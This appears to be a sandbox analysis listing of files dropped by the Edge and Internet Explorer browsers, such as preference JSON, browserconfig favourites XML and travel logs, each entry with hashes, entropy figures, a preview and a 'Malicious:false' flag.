                                                                                                                                                                            Size (bytes):44911
                                                                                                                                                                            Entropy (8bit):6.086412147760607
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dkSdFuUhDO6vP6OE7t/zuhvsR3XDgh1+wbCAoTGoup1Xl3jVzXb:OMk1rT8H1Vc6Mt/zVkh8wbRoThu3VlXb
                                                                                                                                                                            MD5:8261E1EDA96EB64E45506730BCFF8B18
                                                                                                                                                                            SHA1:6B6CE8AFB405BCCDEFF7B25763BBA4ABAD184216
                                                                                                                                                                            SHA-256:879E2BD8FB6D95475276B14B9F0678266C8CAAE01CE190D0E05282CF6EC0C3CD
                                                                                                                                                                            SHA-512:761D94E69BA1FFE5802E2B69238D945C8AE2AE8A58D84A02463CE1490E5E01BDD50989E1E937E18A9810C5D0A3EB563755846081C543BD0DB9D6AB43727C909F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55vViEOsF96z3F4ONrN2yeYHGQlo5wvtB8h5moYSz3q4XkgOLF68CtN9
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):126
                                                                                                                                                                            Entropy (8bit):4.973844138632803
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:D9yRtFwsSxzqC+eAsO2pcIfReYHFk6sOrkHcqTUvFKb:JUF+FqCqd8ZdsOAHqvkb
                                                                                                                                                                            MD5:4BB7A6F899E4F14FE707970F24EC01F1
                                                                                                                                                                            SHA1:28BC1C72CC814347FD4344116ED81B3BFF3F3F37
                                                                                                                                                                            SHA-256:7E161482E9BD934084BD696EEC17AA9C3DB0E0CBC2CD2071377AF41C129C3567
                                                                                                                                                                            SHA-512:575F7BBBD4540B922C354D759D6FD300443953DC8D5C4259BBF65B06CA2FB79B5738B402D116B28D8119AA98910CF1BF8CF6A23F9DA5A68D7457651FE47733CD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20241209.89&quot;}" ltime="1026719472" htime="31148968" /></root>
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):49120
                                                                                                                                                                            Entropy (8bit):0.0017331682157558962
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Ztt:T
                                                                                                                                                                            MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                            SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                            SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                            SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                            Entropy (8bit):2.3221625035009588
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:rJBGW2SllbaGW2SllbkjllbIYlbfYlbWSllbIYlbfYlbe8bpu9u98bpu9:dl2WJUJJUe8b4C8b4
                                                                                                                                                                            MD5:40C6B8ABBAC4768C44719CF3FC9064A6
                                                                                                                                                                            SHA1:602E7C97D30363FA9B663047B6EC9B61C3EF51FF
                                                                                                                                                                            SHA-256:C7DC9864D3D4D13DD205E2A1E79FE9FCF1CD36598CD28C640831C28AFD45C20D
                                                                                                                                                                            SHA-512:9DD8A8EA55B8C91480F8BDEF79327874D878BC0193334B5FE17CD6F76EA1A1BF680CB5616C087B5271FB37241DD326474A92BD9EDFD65FCF5B2713743A42E542
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................;.K......@.........K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................`.......O._.T.S.L.J.R.T.c.5.u.3.7.x.G.M.L.O.z.0.u.1.c.N.y.Q.=.=.........:.......................................
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):5632
                                                                                                                                                                            Entropy (8bit):2.2153885156595163
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:rnGD3xB9lj8FZyw0bKvqy6yEyvy5DlsN5Acb9lj8FZywXvqy:rnGTxZ8FZPoKS9LYu0OU8FZPXS
                                                                                                                                                                            MD5:202BE1F5E39FF552C8D18AD864099865
                                                                                                                                                                            SHA1:FBA606957B88D00A24CB3CDA3729045B095681C6
                                                                                                                                                                            SHA-256:5B1CE3859D487C4F1732364F5BB6BF74932CC55535F761495B641C5D3B3C0945
                                                                                                                                                                            SHA-512:65408CF866F3ADF53BBD8F97C74C6016C1A457D70422E4C4214B88EDC2C9E750E8D9DECEFFDE828069512E6CCD3632D07C41A44C3156DB86A1A409B7D196B6E2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................@.K................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5632
                                                                                                                                                                            Entropy (8bit):2.2124097051941107
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:rJuwxGv9lj84UZyP01ZKvqy6yEyvy5DlsNUAcb9lj84UZyPXvqy:rwEGb8ZZsKZKS9LYu09U8ZZsXS
                                                                                                                                                                            MD5:ED1EE22A7F234B20A2794672807604E8
                                                                                                                                                                            SHA1:8657FFA2A16A2A29D31601D2B18707D15A17A1D3
                                                                                                                                                                            SHA-256:2BBA2504769F4AC59FEAC95E54F05775562A412B083DE2D30992F00ABAFCE03B
                                                                                                                                                                            SHA-512:BE5D63B3727B5A001654AAF05E61DA36971A7A99EBABF94C394ACAB34C31EAE4A9737B4D165EA659ACE9D031C8DA2E96196712123BD54A97424F9C3A9A35C1F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................C.K......@.........K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                            Entropy (8bit):5.081328529006832
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc41E4AHo2AHkNTD90/QL3WIZK0QhPPFVDHkEtMjwu:TMHdNMNxOE4L2XNnWimI00ONVbkEtMb
                                                                                                                                                                            MD5:825347CD76B890A1913258A934B50EE8
                                                                                                                                                                            SHA1:987A64543B606A282ECF1F93D6B62915604F808D
                                                                                                                                                                            SHA-256:83345FC698FBCDF937D5319AB30049B077359E832E00B5073A43B38360C92C67
                                                                                                                                                                            SHA-512:5ADD8CF5470ED8E26656D225E0B5A5B65B4F0C9442280B3BE622435B129632B76CC8F71181F59154AF1FB06C43666DC0EDA97AB00A7B6B908B8C3066E7156831
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x40eff9ba,0x01db4ba8</date><accdate>0x40eff9ba,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                            Entropy (8bit):5.1371574669757925
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTk4ACAEo2ACAEkNTD90/QL3WIZK0QhPPFkI5kU5EtMb:TMHdNMNxe2k4B82BwNnWimI00ONkak6t
                                                                                                                                                                            MD5:8164AF54518399FBBF76AA940D2131D7
                                                                                                                                                                            SHA1:CC81D0103289EA88041BC1CEA44CCAC1999D4A4B
                                                                                                                                                                            SHA-256:F5128EE8FB5A45D6F63CBA4CD1CDEB4CB6E805FC28A1D844ACC437BDA41CFF5B
                                                                                                                                                                            SHA-512:BF2D13B1D950E63B8F92629474196953C1827B8CE4CB921BBE6B5F07439AB39E26D0A0DCD7FA72971E126C1A7D7813535CB17691F41534F474FA106E49F4FB9B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x40e27280,0x01db4ba8</date><accdate>0x40e27280,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (318), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):360
                                                                                                                                                                            Entropy (8bit):5.1437312183853106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4GL4gho2ghkNTD90/QL3WIZK0QhPPFyhBcEEtMjwu:TMHdNMNxvL4gW2gWNnWimI00ONmZEtMb
                                                                                                                                                                            MD5:6B2579CC776D68DF6401B5F638C6A073
                                                                                                                                                                            SHA1:426364A948B7C78881573AA6FE054AD012B3E224
                                                                                                                                                                            SHA-256:054D780F1E54460B5A5FEC0C335659A9F2A1B92E28E938E39138CE9B1D8DADE6
                                                                                                                                                                            SHA-512:2A87A862528F3360EFF5BE21CC281DAE403342D07C259AAC2F44536968B8CC6562476A72B85F1AC301CC65DA4B5048136A5ECE1A256B007862EE7D5184C556D7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x40f266f1,0x01db4ba8</date><accdate>0x40f266f1,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):377
                                                                                                                                                                            Entropy (8bit):5.171265032004802
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltq08eDPOOKaihMtAXno2AYDbdV3kNTD90/QL3WIZK0QhPPFcE/:TMHdNMNxtDPOOKadX2xbdVUNnWimI00A
                                                                                                                                                                            MD5:BB49DC5BDC6EFA7573A1A350CD6F5F89
                                                                                                                                                                            SHA1:52FA27A09380760272B9B640A22B3406DF45CD65
                                                                                                                                                                            SHA-256:97437BD750E9F212AAA2E6BA68C127301FA22CF4D635158E5C2D31C0D4A0C416
                                                                                                                                                                            SHA-512:B95EAF5A5F8D16EFA7FBCE68FA3F239543CB103323475ADB225F9E4809B7F6643CF659324AACABFFB6A93B68A4225C0A015AE6D2F72651E052124D4BBB1F691D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0x40e4d1e0,0x01db4ba8</date><accdate>0x40e72453,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):350
                                                                                                                                                                            Entropy (8bit):5.1056494230211165
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4J4Aw9+Oo2Aw9+OkNTD90/QL3WIZK0QhPPFgE5EtMjwu:TMHdNMNxi4UB2UhNnWimI00ONd5EtMb
                                                                                                                                                                            MD5:47D7FA70347781CB1617634ECC04CF24
                                                                                                                                                                            SHA1:4BC29153AE2C0BEADC96613198C935210E564329
                                                                                                                                                                            SHA-256:9A7CE5CDFF3FDBD8C959F3A82F9F2D87E21648A6A0A87FD01182920A4BF7E635
                                                                                                                                                                            SHA-512:A780770CB1FB69E463A3F9E7A21D8FCA0D7F491E150090DE34BD5DA869BFDF09FFDC9D64B4A07B20AB2D583112D4711BFB298649511620C9EA8B3676158B6065
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x40eb555d,0x01db4ba8</date><accdate>0x40eb555d,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                            Entropy (8bit):5.158384996875204
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGw4gho2XX3kNTD90/QL3WIZK0QhPPF8K0QU5EtMjwu:TMHdNMNxhGw4gW2XXUNnWimI00ON8K0z
                                                                                                                                                                            MD5:B32E3FFA718518AD0E0BE2CC82064E9E
                                                                                                                                                                            SHA1:B761DFB8077EBDA7E9136C3E15149B3C924F84A3
                                                                                                                                                                            SHA-256:4CEF935BCEFC05E81AFC3D9C7C01C789463F5197C663CBC5669B16B718EA4C1E
                                                                                                                                                                            SHA-512:73D02C85256389AF0F18BF8A527D1A841A64D5BE712B7435096D0E0EA6DDF494FAB4D3771349148D324A3B212AEB99181A6AA048A8211904018A3037AEB2A858
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x40f266f1,0x01db4ba8</date><accdate>0x40f4d257,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                            Entropy (8bit):5.122015872322056
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4Qun4AYo2AYkNTD90/QL3WIZK0QhPPFAkEtMjwu:TMHdNMNx0n4E2YNnWimI00ONxEtMb
                                                                                                                                                                            MD5:2161BF099A2D3321151411B94D8E47A2
                                                                                                                                                                            SHA1:032B0C905027398BEC2A44A9E7DA66EC96AFD0C3
                                                                                                                                                                            SHA-256:73509FF39D15987997794FA393D895F8BA7C52CEB77491E888DF3474BBC08A1A
                                                                                                                                                                            SHA-512:21803B9517577194C664FB0CF9479EF6BCF14427F3FBEB0DC047CA794DDE46781A9C865248FCECF744D93C61A7502D76C568312864A144B615E430EFD2309E1B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x40edb265,0x01db4ba8</date><accdate>0x40edb265,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                            Entropy (8bit):5.162370536998626
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4oT4Aw9+Oo2AYkNTD90/QL3WIZK0QhPPF6Kq5EtMjwu:TMHdNMNxx4UB2YNnWimI00ON6Kq5EtMb
                                                                                                                                                                            MD5:01B72D242B3D3A11D1F40C6E8C56D179
                                                                                                                                                                            SHA1:B31E32F4AC6777BE8A765365FAC584F6DCF01572
                                                                                                                                                                            SHA-256:B48E94EAEDCB73DE6780C204D8370BCE1F3AF590AF3BD5BDACB3BDC0EA1E0DE8
                                                                                                                                                                            SHA-512:5DB77F4FA225DC3361119991103B5D56B3BA482EFC3D24655410605D04070B6817FAFCB88332E6728EE53D9B3343D9B8C7201DA1BA252DB2F823BC3284D7BAEF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x40eb555d,0x01db4ba8</date><accdate>0x40edb265,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (316), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):358
                                                                                                                                                                            Entropy (8bit):5.130974407109051
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2n4AYDbdV3o2AYDbdV3kNTD90/QL3WIZK0QhPPF02Cqt:TMHdNMNxc4xbdV42xbdVUNnWimI00ONb
                                                                                                                                                                            MD5:992C5ED56D0B97D3296AEBF98F46BD64
                                                                                                                                                                            SHA1:2B79DFA265D48253C51E909C1610C9969174803B
                                                                                                                                                                            SHA-256:32B093411E4AB9E1633892912C725C950E0468993EABE060ACA5B2235DFCEBC2
                                                                                                                                                                            SHA-512:6C41A41D5FD93F2ED7D395214FB7BEE313F1B1AC5221F3F713BECCDED4E2B4BB8CB106D11821F060AD7237A2DBA65543A076E343E4062F3F631B92200D061833
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x40e72453,0x01db4ba8</date><accdate>0x40e72453,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                            Entropy (8bit):5.0837760267912495
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4In4AcEo2AcEkNTD90/QL3WIZK0QhPPFiwE5EtMjwu:TMHdNMNxfn4Tb2THNnWimI00ONe5EtMb
                                                                                                                                                                            MD5:29D44377D20DC89BE887A241BD1CF44E
                                                                                                                                                                            SHA1:BDB766B4DD15A7B6797C08C70A09F4530B78A2F0
                                                                                                                                                                            SHA-256:09ADAF6E6D6C26E5461D45A9E003B0F1356244542F7684F4ECC6146B37BD83A0
                                                                                                                                                                            SHA-512:76B3B362681F02C8A0F2DC01CFD46C50A53871C5D1DF239914D06CE7C846C02167ACD1AB8324AF3E075BF8FC6D20A767C6A2750FE8A130304E2FBD0724B330B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x40e980e8,0x01db4ba8</date><accdate>0x40e980e8,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8780
                                                                                                                                                                            Entropy (8bit):5.893737476841811
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:AYh7TWqFpzTTGjT/VfybZYh7TWqFpzTTGjT/VfybC:ziqFp/Tc/RmkiqFp/Tc/RmC
                                                                                                                                                                            MD5:9F2686FFC8DD77BC7F74F459610AC744
                                                                                                                                                                            SHA1:11719C2623406E6CEE0D642B5642C39AFDA1B44C
                                                                                                                                                                            SHA-256:DCDC0899A069FB9A62F4E46F9B8E596EABC3296C0BDAB64F4C895BB7AAF5BFCB
                                                                                                                                                                            SHA-512:A9C84B8211927D2EC306000BEEC4062EFC0AD739655A08CE916FADF26CD7D018AE5DE2E1B492607AE69771C2AF6B5E94328CF9064171662FA1AA35A21F645408
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..........h.t.t.p.s.:././.w.w.w...m.s.n...c.o.m./.f.a.v.i.c.o.n...i.c.o........... .... .........(... ...@..... .................................G..."...?..<2...)...'...-...8..uD...@...8...............2...2...1...1...2...4...7...6.......................................T...Q...S..*J...@...9...7...:...B...K...U.|/G...[.r.....C...=...?..c@...D...E...D...D..{]...H...................................i.a.:...].p.U.{.N...H...F...H...L...S.~.\.q.f.c4`.h...g.R...O...P...S...V...V...U...S...S.. T...................................m.V.o.R.i.^.a.j.Z.u.T.}.R...S...V.z.\.q.e.e.l.V.i.E j.H.Y...Y...Z...Z...Z...Z...Z...Y...Y..KY...................................g.E.e.A.j.K.k.X.f.c.`.k.^.o.^.n.a.j.f.c.l.X.h.H.[.5.E...U...[...[...[...Z...Z...Z...Z...Z..cZ...................................Z.5.N.(.[.6.d.B.k.P.k.X.j.].j.].k.Z.m.S.h.H.\.7.M.$.@..SK.8.]...Z...[...[...[...[...[...[..d[...................................M.&.L.#.L.#YR.*.].7.d.B.h.H.j.I.h.G.c.?.Z.4.N.%.?...=...}h....}.yb.\y..Z...[...[...[...[.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2278
                                                                                                                                                                            Entropy (8bit):3.853521147192857
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:uiTrlKxrgxzxl9Il8uxF0UUbf69T+yYX+2s3TMgM0Hsd1rc:myYnQC9SybDblL
                                                                                                                                                                            MD5:99B365A4BBD2B83B2562B2140AA0A12A
                                                                                                                                                                            SHA1:EEF46688085EA13FF20D7BCF84EAA19708FCE3D7
                                                                                                                                                                            SHA-256:9303590A87DAF7C62FB4FD0820654350A0EF75EAD1B57E0E111B3A30059C2EDF
                                                                                                                                                                            SHA-512:BAA5CE7D2801682AFC2302361C19E47518F164539D098C20CE3C36DB9C23DB8E544C2F7AAE072F87F35A97A41304D7077E3FD87DF7616F4C63C547157CDFD925
                                                                                                                                                                            Malicious:false
